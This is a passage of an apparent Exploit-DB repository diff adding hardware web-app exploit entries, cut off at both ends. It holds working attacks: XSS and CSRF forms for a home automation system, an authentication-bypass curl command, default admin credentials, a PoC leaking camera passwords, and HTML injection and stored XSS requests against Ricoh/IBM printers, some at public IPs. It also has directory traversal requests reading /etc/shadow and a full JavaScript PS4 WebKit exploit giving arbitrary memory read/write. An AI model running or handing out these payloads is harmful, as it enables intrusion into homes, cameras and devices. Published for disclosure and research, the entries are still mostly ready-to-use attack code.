+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php
+
+
+06.10.2019
+
+--
+
+
+Reflected XSS in User and Password POST parameters in login.php:
+--
+<html>
+  <body>
+    <form action="http://192.168.1.10/login.php" method="POST">
+      <input type="hidden" name="cmd" value="doLogin" />
+      <input type="hidden" name="User" value=""><marquee>SLIDERS<&#47;marquee>" />
+      <input type="hidden" name="Password" value=""><script>confirm&#40;251&#41;<&#47;script>" />
+      <input type="hidden" name="btnLogin" value="Login" />
+      <input type="submit" value="Send" />
+    </form>
+  </body>
+</html>
+
+
+Example CSRF schedule temperature for day, afternoon, night: 19.0, 18.0, 15.0
+--
+GET /bridge.php?command=STC&parameter=25,1,1&dati=190,180,150,1454025386,85,-1433059328, HTTP/1.1
+
+
+Example CSRF enable/disable alarm:
+--
+GET /antitheft.php?command=Attiva&codice=32&rnd=0.8815229032260505 HTTP/1.1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47822.txt b/exploits/hardware/webapps/47822.txt
new file mode 100644
index 000000000..f5680e443
--- /dev/null
+++ b/exploits/hardware/webapps/47822.txt
@@ -0,0 +1,88 @@
+# Exploit: AVE DOMINAplus 1.10.x - Authentication Bypass
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: AVE S.p.A.
+# Product web page: https://www.ave.it | https://www.domoticaplus.it
+# Affected version: Web Server Code 53AB-WBS - 1.10.62
+# Advisory ID: ZSL-2019-5549
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5549.php
+
+AVE DOMINAplus <=1.10.x Authentication Bypass Exploit
+
+
+Vendor: AVE S.p.A.
+Product web page: https://www.ave.it | https://www.domoticaplus.it
+Affected version: Web Server Code 53AB-WBS - 1.10.62
+                  Touch Screen Code TS01 - 1.0.65
+                  Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
+                  Touch Screen Code TS05 - 1.10.36
+                  Models: 53AB-WBS
+                          TS01
+                          TS03V
+                          TS04X-V
+                          TS05N-V
+                  App version: 1.10.77
+                  App version: 1.10.65
+                  App version: 1.10.64
+                  App version: 1.10.62
+                  App version: 1.10.60
+                  App version: 1.10.52
+                  App version: 1.10.52A
+                  App version: 1.10.49
+                  App version: 1.10.46
+                  App version: 1.10.45
+                  App version: 1.10.44
+                  App version: 1.10.35
+                  App version: 1.10.25
+                  App version: 1.10.22
+                  App version: 1.10.11
+                  App version: 1.8.4
+                  App version: TS1-1.0.65
+                  App version: TS1-1.0.62
+                  App version: TS1-1.0.44
+                  App version: TS1-1.0.10
+                  App version: TS1-1.0.9
+
+Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
+Designed to revolutionize your concept of living. DOMINA plus is the AVE home
+automation proposal that makes houses safer, more welcoming and optimized. In
+fact, our home automation system introduces cutting-edge technologies, designed
+to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
+and security and offers advanced supervision tools in order to learn how to
+evaluate and reduce consumption through various solutions dedicated to energy
+saving.
+
+Desc: DOMINAplus suffers from an authentication bypass vulnerability due to missing
+control check when directly calling the autologin GET parameter in changeparams.php
+script. Setting the autologin value to 1 allows an unauthenticated attacker to
+permanently disable the authentication security control and access the management
+interface with admin privileges without providing credentials.
+
+Tested on: GNU/Linux 4.1.19-armv7-x7
+           GNU/Linux 3.8.13-bone50/bone71.1/bone86
+           Apache/2.4.7 (Ubuntu)
+           Apache/2.2.22 (Debian)
+           PHP/5.5.9-1ubuntu4.23
+           PHP/5.4.41-0+deb7u1
+           PHP/5.4.36-0+deb7u3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5549
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5549.php
+
+
+06.10.2019
+
+--
+
+
+#
+# Mina... Mina, open your eyes!
+#
+
+$ curl -s http://192.168.1.10/changeparams.php?operazione=3&autologin=1
+1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47823.txt b/exploits/hardware/webapps/47823.txt
new file mode 100644
index 000000000..cfc8b049d
--- /dev/null
+++ b/exploits/hardware/webapps/47823.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Heatmiser Netmonitor 3.03 - Hardcoded Credentials
+# Date: 2019-12-22 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.heatmiser.com/en/
+# Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf
+# Software: Netmonitor v3.03
+# Product Version: Netmonitor v3.03
+# CWE : CWE-798
+# Vulenrability: Use of Hard-coded Credentials
+# CVE: N/A
+
+# Decription :
+# Hard-coded Credentials security vulnerability of Netmonitor model v3.03
+# from Heatmiser manufacturer has been discovered. With this
+# vulnerability, the hidFrm form in the source code of the page
+# anonymously has access to hidden input codes. This information is
+# contained in the input field of the hidFrm form in the source code
+# lognm and logpd.
+
+
+HTTP GET Request : /networkSetup.htm HTTP/1.1
+
+<form name="hidFrm" method="post">
+<input type="hidden" name="lognm" value="admin">
+<input type="hidden" name="logpd" value="admin">
+<input type="hidden" name="ip" value="XXX.XXX.XXX.XXX">
+<input type="hidden" name="mask" value="XXX.XXX.XXX.XXX">
+<input type="hidden" name="gate" value="XXX.XXX.XXX.XXX">
+<input type="hidden" name="dns" value="XXX.XXX.XXX.XXX">
+<input type="hidden" name="timestr" value="04:27">
+<input type="hidden" name="datestr" value="23/12/2019">
+<input type="hidden" name="timeflag" ,="" value="0">
+<input type="hidden" name="gmtflag" ,="" value="1">
+</form>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47824.txt b/exploits/hardware/webapps/47824.txt
new file mode 100644
index 000000000..23199ee28
--- /dev/null
+++ b/exploits/hardware/webapps/47824.txt
@@ -0,0 +1,72 @@
+# Exploit: MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: Emmanuel
+# Product web page: https://github.com/empierre/MyDomoAtHome
+# https://www.domoticz.com/wiki/ImperiHome
+# https://docs.imperihome.com/app/iss
+# Affected version: 0.2.40
+# Advisory ID: ZSL-2019-5555
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5555.php
+
+MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure
+
+
+Vendor: Emmanuel
+Product web page: https://github.com/empierre/MyDomoAtHome
+                  https://www.domoticz.com/wiki/ImperiHome
+                  https://docs.imperihome.com/app/iss
+Affected version: 0.2.40
+
+Summary: REST Gateway between Domoticz and Imperihome ISS. Domoticz is a home automation
+system with a pretty wide library of supported devices, ranging from weather stations to
+smoke detectors to remote controls, and a large number of additional third-party integrations
+are documented on the project's website. It is designed with an HTML5 frontend, making it
+accessible from desktop browsers and most modern smartphones, and is lightweight, running
+on many low-power devices like the Raspberry Pi.
+
+Desc: MyDomoAtHome REST API is affected by an information disclosure vulnerability due to
+improper access control enforcement. An unauthenticated remote attacker can exploit this,
+via a specially crafted request to gain access to sensitive information.
+
+Tested on: NodeJS: 10.15.0, 8.15.1, 8.15.0, 8.11.1, 8.9.4, 4.8.7, 4.2.2
+           Webmanager/Engine: EJS
+           Renderer: Express
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5555
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5555.php
+
+
+07.11.2019
+
+--
+
+
+--snip--
+Device Type string: DevCamera
+Param Key        Description
+----------------------------
+localjpegurl     Local URL to the JPEG snapshot of the camera (Note : login/pass can be passed like this http://login:pass@url)
+localmjpegurl    Local URL to the camera's MJPEG stream
+remotejpegurl    Remote URL to the JPEG snapshot of the camera
+remotemjpegurl   Remote URL to the camera's MJPEG stream
+--snip--
+
+
+PoC #1:
+-------
+
+root@kali:~/domoticz# curl -s http://192.168.0.100:3001/devices |tail -c $((100+850))
+[{"value":"http://admin:s3cr3t0P4ssw0rduz@192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"Extérieur","type":"DevCamera","id":"2_cam","room":"Switches"},{"params":[{"value":"http://admin2:An0th3rs3cr3tp4ss@192.168.0.15:8084/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin2&pwd=An0th3rs3cr3tp4ss","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"cuisine","type":"DevCamera","id":"3_cam","room":"Switches"},{"params":[{"value":"http://127.0.0.1:8080/uvccapture.cgi","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"uvccam","type":"DevCamera","id":"4_cam","room":"Switches"}]}
+
+
+PoC #2:
+-------
+
+root@kali:~/domoticz# curl -s http://192.168.1.100:3001/devices |tail -c $((200-22))
+{"id":"C0","name":"Portail","type":"DevCamera","room":"Switches","params":[{"key":"localjpegurl","value":"http://admin:y3T4n0ther1&&@http://192.168.1.210/doc/page/preview.asp"}]}]}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47826.txt b/exploits/hardware/webapps/47826.txt
new file mode 100644
index 000000000..3283ff80e
--- /dev/null
+++ b/exploits/hardware/webapps/47826.txt
@@ -0,0 +1,47 @@
+# Exploit Title: RICOH SP 4510SF Printer - HTML Injection
+# Date: 2019-05-06 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re1/model/sp4510/sp4510.htm
+# Software: RICOH Printer
+# Product Version: SP 4510SF
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: N/A
+
+# Description :
+# An HTML Injection vulnerability has been discovered on the RICOH SP 4510SF 
+# via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
+
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 218
+Origin: http://XXX.XXX.XX.XXX
+Connection: close
+Referer: http://189.72.192.16/web/entry/en/address/adrsList.cgi
+Cookie: risessionid=058916016024825; cookieOnOffChecker=on; wimsesid=314062051
+
+mode=ADDUSER&step=BASE&wimToken=1273767750&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3Eismailtasdelen&entryDisplayNameIn=%22%3E%3Ch1%3Eismailtasdelen&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
+
+# HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Fri, 20 Dec 2019 07:59:19 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Fri, 20 Dec 2019 07:59:19 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+[14]
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47827.txt b/exploits/hardware/webapps/47827.txt
new file mode 100644
index 000000000..a81b49fd8
--- /dev/null
+++ b/exploits/hardware/webapps/47827.txt
@@ -0,0 +1,21 @@
+# Exploit Title: RICOH Web Image Monitor 1.09 - HTML Injection
+# Date: 2019-05-06 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support-download.com/services/device/webhlp/nb/gen/v140cc1/en/p_top010.html
+# Software: RICOH Web Image Monitor
+# Product Version: v1.09
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: N/A
+
+# Descripton :
+# It has been discovered that in the v1.09 version of Image Monitor from
+# RICOH, HTML Injection can be run on the /web/entry/en/address/adrsSetUserWizard.cgi
+# function. This vulnerability affected all hardware that uses the entire
+# Image Monitor v1.09.
+
+# Attack Vectors :
+
+You can run HTML Injection on the entryNameIn and entryDisplayNameIn in the corresponding function.
+HTML Injection Payload : "><h1>ismailtasdelen
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47828.txt b/exploits/hardware/webapps/47828.txt
new file mode 100644
index 000000000..ca3561ea3
--- /dev/null
+++ b/exploits/hardware/webapps/47828.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Heatmiser Netmonitor 3.03 - HTML Injection
+# Date: 2019-12-22 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.heatmiser.com/en/
+# Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf
+# Software: Netmonitor v3.03
+# Product Version: Netmonitor v3.03
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: N/A
+
+# Description :
+# Heatmiser Net Monitor v3.03 allows HTML Injection via the
+# outputSetup.htm outputtitle parameter. The HTML Injection
+# vulnerability was discovered in v3.03 version of Net Monitor
+# from the Heatmiser manufacturer. This vulnerability is
+# vulnerable to hardware that use this software.
+
+
+# HTTP Post Request :
+
+POST /outputSetup.htm HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 95
+Origin: http://XXX.XXX.XXX.XXX
+Connection: close
+Referer: http://TARGET/outputSetup.htm
+Upgrade-Insecure-Requests: 1
+
+outputtitle=%22%3E%3Cmarquee%3ETEST%23undefined%23undefined%23undefined%23undefined%23undefined
+
+# HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Sun, 22 Dec 2019 20:25:22 GMT
+Server: Z-World Rabbit
+Connection: close
+Content-Type: text/html
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47835.txt b/exploits/hardware/webapps/47835.txt
new file mode 100644
index 000000000..4f456cd2d
--- /dev/null
+++ b/exploits/hardware/webapps/47835.txt
@@ -0,0 +1,34 @@
+# Exploit Title: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
+# Date: 2020-01-01
+# Exploit Author: Raif Berkay Dincel
+# Vendor Homepage: ibm.com
+# Software https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?subtype=ca&infotype=an&appname=iSource&supplier=897&letternum=ENUS107-295
+# Version: 1.11
+# CVE-ID: N/A
+# Tested on: Linux Mint / Windows 10
+# Vulnerabilities Discovered Date : 2019/06/10
+
+# Vulnerable Parameter Type: GET
+# Vulnerable Parameter: TARGET/[Payload]
+
+# Proof of Concepts:
+
+TARGET/./../../../../../../../../../../etc/shadow
+
+# Request:
+
+GET /./../../../../../../../../../../etc/shadow HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/json; charset=UTF-8
+Connection: close
+
+# Response:
+
+root:::XXXXX
+www-data:::XXXXX
+nobody:::XXXXX
+default:::XXXXX
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47850.txt b/exploits/hardware/webapps/47850.txt
new file mode 100644
index 000000000..66d635d1b
--- /dev/null
+++ b/exploits/hardware/webapps/47850.txt
@@ -0,0 +1,35 @@
+# Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
+# Date: 2020-01-02 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ibm.com/il-en
+# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN
+# Vulernability Type: Cross-site Scripting
+# Vulenrability: Stored XSS
+# CVE: N/A
+
+# Description :
+# Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the
+# cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.)
+
+HTTP Request :
+
+POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1
+Host: 134.84.35.70
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 281
+Origin: https://134.84.35.70
+Connection: close
+Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html
+Upgrade-Insecure-Requests: 1
+
+0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40=
+
+HTTP Response :
+
+HTTP/1.0 200 OK
+Content-Type: text/html
+Content-Length: 269
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47882.txt b/exploits/hardware/webapps/47882.txt
new file mode 100644
index 000000000..f3c232c51
--- /dev/null
+++ b/exploits/hardware/webapps/47882.txt
@@ -0,0 +1,19 @@
+# Exploit Title: piSignage 2.6.4 - Directory Traversal
+# Date: 2019-11-13
+# Exploit Author: JunYeong Ko
+# Vendor Homepage: https://pisignage.com/
+# Version:  piSignage before 2.6.4
+# Tested on: piSignage before 2.6.4
+# CVE : CVE-2019-20354
+
+Summary:
+The web application component of piSignage before 2.6.4 allows a remote attacker (authenticated as a low-privilege user) to download arbitrary files from the Raspberry Pi via api/settings/log?file=../ path traversal. In other words, this issue is in the player API for log download.
+
+PoC:
+1. Click the Log Download button at the bottom of the 'piSignage' administration page.
+2. HTTP Packet is sent when the button is pressed.
+3. Change the value of 'file' parameter to ../../../../../../../../../../etc/passwd.
+4. You can see that the /etc/passwd file is read.
+
+References:
+https://github.com/colloqi/piSignage/issues/97
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47893.js b/exploits/hardware/webapps/47893.js
new file mode 100644
index 000000000..820ef5d7c
--- /dev/null
+++ b/exploits/hardware/webapps/47893.js
@@ -0,0 +1,267 @@
+/*
+
+bad_hoist
+============
+
+Exploit implementation of
+[CVE-2018-4386](https://bugs.chromium.org/p/project-zero/issues/detail?id=1665).
+Obtains addrof/fakeobj and arbitrary read/write primitives.
+
+Supports PS4 consoles on 6.XX. May also work on older firmware versions,
+but I am not sure. Bug was fixed in firmware 7.00.
+
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47893.zip
+*/
+
+
+var STRUCTURE_SPRAY_SIZE = 0x1800;
+
+var g_confuse_obj = null;
+var g_arb_master = null;
+var g_arb_slave = new Uint8Array(0x2000);
+var g_leaker = {};
+var g_leaker_addr = null;
+var g_structure_spray = [];
+
+var dub = new Int64(0x41414141, 0x41414141).asDouble();
+var g_inline_obj = {
+    a: dub,
+    b: dub,
+};
+
+function spray_structs() {
+    for (var i = 0; i < STRUCTURE_SPRAY_SIZE; i++) {
+        var a = new Uint32Array(0x1)
+        a["p" + i] = 0x1337;
+        g_structure_spray.push(a); // keep the Structure objects alive.
+    }
+
+}
+
+function trigger() {
+
+    var o = {
+        'a': 1
+    };
+
+    var test = new ArrayBuffer(0x100000);
+    g_confuse_obj = {};
+
+    var cell = {
+        js_cell_header: new Int64([
+            0x00, 0x8, 0x00, 0x00, // m_structureID, current guess
+            0x0, // m_indexingType
+            0x27, // m_type, Float64Array
+            0x18, // m_flags, OverridesGetOwnPropertySlot |
+            // InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero
+            0x1 // m_cellState, NewWhite
+        ]).asJSValue(),
+        butterfly: false, // Some arbitrary value
+        vector: g_inline_obj,
+        len_and_flags: (new Int64('0x0001000100000020')).asJSValue()
+    };
+
+    g_confuse_obj[0 + "a"] = cell;
+
+    g_confuse_obj[1 + "a"] = {};
+    g_confuse_obj[1 + "b"] = {};
+    g_confuse_obj[1 + "c"] = {};
+    g_confuse_obj[1 + "d"] = {};
+
+
+    for (var j = 0x5; j < 0x20; j++) {
+        g_confuse_obj[j + "a"] = new Uint32Array(test);
+    }
+
+    for (var k in o) {
+        {
+            k = {
+                a: g_confuse_obj,
+                b: new ArrayBuffer(test.buffer),
+                c: new ArrayBuffer(test.buffer),
+                d: new ArrayBuffer(test.buffer),
+                e: new ArrayBuffer(test.buffer),
+                1: new ArrayBuffer(test.buffer),
+
+            };
+
+            function k() {
+                return k;
+            }
+
+        }
+
+        o[k];
+
+        if (g_confuse_obj["0a"] instanceof Uint32Array) {
+            return;
+        }
+    }
+}
+
+function setup_arb_rw() {
+    var jsCellHeader = new Int64([
+        0x00, 0x08, 0x00, 0x00, // m_structureID, current guess
+        0x0, // m_indexingType
+        0x27, // m_type, Float64Array
+        0x18, // m_flags, OverridesGetOwnPropertySlot |
+        // InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero
+        0x1 // m_cellState, NewWhite
+    ]);
+    g_fake_container = {
+        jsCellHeader: jsCellHeader.asJSValue(),
+        butterfly: false, // Some arbitrary value
+        vector: g_arb_slave,
+        lengthAndFlags: (new Int64('0x0001000000000020')).asJSValue()
+    };
+
+    g_inline_obj.a = g_fake_container;
+    g_confuse_obj["0a"][0x4] += 0x10;
+    g_arb_master = g_inline_obj.a;
+    g_arb_master[0x6] = 0xFFFFFFF0;
+}
+
+function read(addr, length) {
+    if (!(addr instanceof Int64))
+        addr = new Int64(addr);
+
+    g_arb_master[4] = addr.low32();
+    g_arb_master[5] = addr.hi32();
+
+    var a = new Array(length);
+
+    for (var i = 0; i < length; i++)
+        a[i] = g_arb_slave[i];
+    return a;
+}
+
+function read8(addr) {
+    return read(addr, 1)[0];
+}
+
+function read16(addr) {
+    return Struct.unpack(Struct.int16, read(addr, 2));
+}
+
+function read32(addr) {
+    return Struct.unpack(Struct.int32, read(addr, 4));
+}
+
+function read64(addr) {
+    return new Int64(read(addr, 8));
+}
+
+function readstr(addr) {
+    if (!(addr instanceof Int64))
+        addr = new Int64(addr);
+    g_arb_master[4] = addr.low32();
+    g_arb_master[5] = addr.hi32();
+    var a = [];
+    for (var i = 0;; i++) {
+        if (g_arb_slave[i] == 0) {
+            break;
+        }
+        a[i] = g_arb_slave[i];
+    }
+    return String.fromCharCode.apply(null, a);
+}
+
+function write(addr, data) {
+    if (!(addr instanceof Int64))
+        addr = new Int64(addr);
+    g_arb_master[4] = addr.low32();
+    g_arb_master[5] = addr.hi32();
+    for (var i = 0; i < data.length; i++)
+        g_arb_slave[i] = data[i];
+}
+
+function write8(addr, val) {
+    write(addr, [val]);
+}
+
+function write16(addr, val) {
+    write(addr, Struct.pack(Struct.int16, val));
+}
+
+
+function write32(addr, val) {
+    write(addr, Struct.pack(Struct.int32, val));
+}
+
+function write64(addr, val) {
+    if (!(val instanceof Int64))
+        val = new Int64(val);
+    write(addr, val.bytes());
+}
+
+function writestr(addr, str) {
+    if (!(addr instanceof Int64))
+        addr = new Int64(addr);
+    g_arb_master[4] = addr.low32();
+    g_arb_master[5] = addr.hi32();
+    for (var i = 0; i < str.length; i++)
+        g_arb_slave[i] = str.charCodeAt(i);
+    g_arb_slave[str.length] = 0; // null character
+}
+
+
+function setup_obj_leaks() {
+    g_leaker.leak = false;
+    g_inline_obj.a = g_leaker;
+    g_leaker_addr = new Int64(g_confuse_obj["0a"][4], g_confuse_obj["0a"][5]).add(0x10);
+    debug_log("obj_leaker address @ " + g_leaker_addr);
+}
+
+function addrof(obj) {
+    g_leaker.leak = obj;
+    return read64(g_leaker_addr);
+}
+
+function fakeobj(addr) {
+    write64(g_leaker_addr, addr);
+    return g_leaker.leak;
+}
+
+function typed_array_buf_addr(typed_array) {
+    return read64(addrof(typed_array).add(0x10));
+}
+
+function cleanup() {
+    var u32array = new Uint32Array(8);
+    header = read(addrof(u32array), 0x10);
+    write(addrof(g_arb_master), header);
+    write(addrof(g_confuse_obj['0a']), header);
+
+    // Set length to 0x10 and flags to 0x1
+    // Will behave as OversizeTypedArray which can survive gc easily
+    write32(addrof(g_arb_master).add(0x18), 0x10);
+    write32(addrof(g_arb_master).add(0x1C), 0x1); //
+    write32(addrof(g_confuse_obj['0a']).add(0x18), 0x10);
+    write32(addrof(g_confuse_obj['0a']).add(0x1C), 0x1);
+    write32(addrof(g_arb_slave).add(0x1C), 0x1);
+
+    var empty = {};
+    header = read(addrof(empty), 0x8);
+    write(addrof(g_fake_container), header);
+}
+
+function start_exploit() {
+    debug_log("Spraying Structures...");
+    spray_structs();
+    debug_log("Structures sprayed!");
+    debug_log("Triggering bug...");
+    trigger();
+    debug_log("Bug successfully triggered!");
+    debug_log("Crafting fake array for arbitrary read and write...");
+    setup_arb_rw();
+    debug_log("Array crafted!");
+    debug_log("Setting up arbitrary object leaks...");
+    setup_obj_leaks();
+    debug_log("Arbitrary object leaks achieved!");
+    debug_log("Cleaning up corrupted structures...");
+    cleanup();
+    debug_log("Cleanup done!");
+    debug_log("Starting post exploitation...");
+}
+
+start_exploit();
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47917.txt b/exploits/hardware/webapps/47917.txt
new file mode 100644
index 000000000..d3b1cc4d5
--- /dev/null
+++ b/exploits/hardware/webapps/47917.txt
@@ -0,0 +1,37 @@
+# Exploit Title: IBM RICOH InfoPrint 6500 Printer - HTML Injection
+# Date: 2020-01-02 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ibm.com/il-en
+# Hardware Link: http://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-214
+# Firmware Version: 1.4.40.10
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: N/A
+
+# Description :
+# Ricoh InfoPrint 6500 devices allow /config?destConf.html
+# HTML Injection by authenticated users, as demonstrated by the 166 parameter.
+
+HTTP Request :
+
+POST /config?destConf.html HTTP/1.1
+Host: SERVER
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 81
+Origin: SERVER
+Authorization: Basic cm9vdDpyb290
+Connection: close
+Referer: http://SERVER/config?destConf.html
+Upgrade-Insecure-Requests: 1
+
+166=%22%3E%3Ch1%3EIsmail+Tasdelen&182=1&230=1&198=1&190=1&222=1&238=1&270=0&486=0
+
+HTTP Response :
+
+HTTP/1.0 200 OK
+Server: Microplex emHTTPD/1.0
+Content-Type: text/html
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47918.txt b/exploits/hardware/webapps/47918.txt
new file mode 100644
index 000000000..68b449068
--- /dev/null
+++ b/exploits/hardware/webapps/47918.txt
@@ -0,0 +1,37 @@
+# Exploit Title: IBM RICOH 6400 Printer - HTML Injection
+# Date: 2020-01-02 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ibm.com/il-en
+# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=649/ENUSA02-1405&appname=USN
+# Firmware Version: 1.1.26.3
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: N/A
+
+# Description :
+# Ricoh InfoPrint 6400 devices allow /config?logpathConf.html
+# HTML Injection by authenticated users, as demonstrated by the 420 parameter.
+
+HTTP Request :
+
+POST /config?logpathConf.html HTTP/1.1
+Host: SERVER
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 54
+Origin: SERVER
+Authorization: Basic cm9vdDpyb290
+Connection: close
+Referer: http://SERVER/config?logpathConf.html
+Upgrade-Insecure-Requests: 1
+
+428=&420=%22%3E%3Cmarquee%3EIsmail+Tasdelen&548=5&564=
+
+HTTP Response :
+
+HTTP/1.0 200 OK
+Server: Microplex emHTTPD/1.0
+Content-Type: text/html
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47923.rb b/exploits/hardware/webapps/47923.rb
new file mode 100755
index 000000000..857fa8396
--- /dev/null
+++ b/exploits/hardware/webapps/47923.rb
@@ -0,0 +1,57 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
